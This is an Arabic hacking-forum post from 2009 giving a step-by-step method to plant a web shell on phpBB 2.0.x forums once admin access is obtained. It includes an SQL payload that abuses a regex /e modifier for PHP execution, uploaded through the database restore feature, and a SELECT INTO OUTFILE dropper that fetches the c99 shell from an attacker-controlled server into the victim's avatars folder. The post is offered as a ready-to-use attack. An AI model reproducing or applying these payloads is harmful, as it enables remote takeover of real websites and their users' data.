عرض مشاركة واحدة
قديم 07-19-2009, 03:33 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
megainfo
 
الصورة الرمزية megainfo
 

 

 
إحصائية العضو





megainfo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
megainfo is on a distinguished road

افتراضي حصري [ رفع الشيل عن طريق PHPBB admin ]


السلام عليكم ورحمه الله وبركاته

مجرب على : PHPBB 2.0.19 , 2.0.23

إذا كان لديك ادمين فروم PHPBB ولم تستطع رفع الشيل ، إذا ألحل هنا وحصريا ...

1. تدخل على administration پانل
2. حرر ملف جديد في جهازك shell.sql وضع هذا آلكود sql

كود:
UPDATE users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_ID;
YOUR_ID هو ID بتاعك في فروم ، تقدر تستعمل 2 إلي هو تاع admin forum

3.إذهب الى Restore Database و اعمل upload للملف shell.sql

4. إذهب الى EDIT account في forum و ليس administration پانل
Wow


يمكنك رؤية phpinfo تعمل ....

يمكنك الآن كتآبة اي كودPHP آخر لوووووووووووول


هذا آلكود لرفع الشيل :

كود:
#
# Table Data for phpbb_categories
#

SELECT '<?php $l=fopen("/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php","a+") or die("Could not open file!"); fwrite($l,file_get_*******s("http://www.your_server.com/c99.php.txt"));fclose($l); ?>' INTO OUTFILE '/home/local/httpd/virtual/site_victime/htdocs/forum/images/avatars/uploder_shell.php';
http://www.your_server.com/c99.php.txt


بعد upload، تفتح الصفحة :
http://www.vicitm_site.com/forum/ima...oder_shell.php


بعدها، الصفحة shell.php تتكون دآخل آلمجلد avatars

يمكنك تغيير المسار :
/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php

على حسب السيرفر


إفتح الصفحة لتشغيل الشيل --->

http://www.vicitm_site.com/forum/ima...tars/shell.php



وسلام



pwvd F vtu hgadg uk 'vdr PHPBB admin D

التوقيع

http://img408.imageshack.us/img408/9...dermanlogo.jpg

 


التعديل الأخير تم بواسطة megainfo ; 07-19-2009 الساعة 06:09 PM.

   

رد مع اقتباس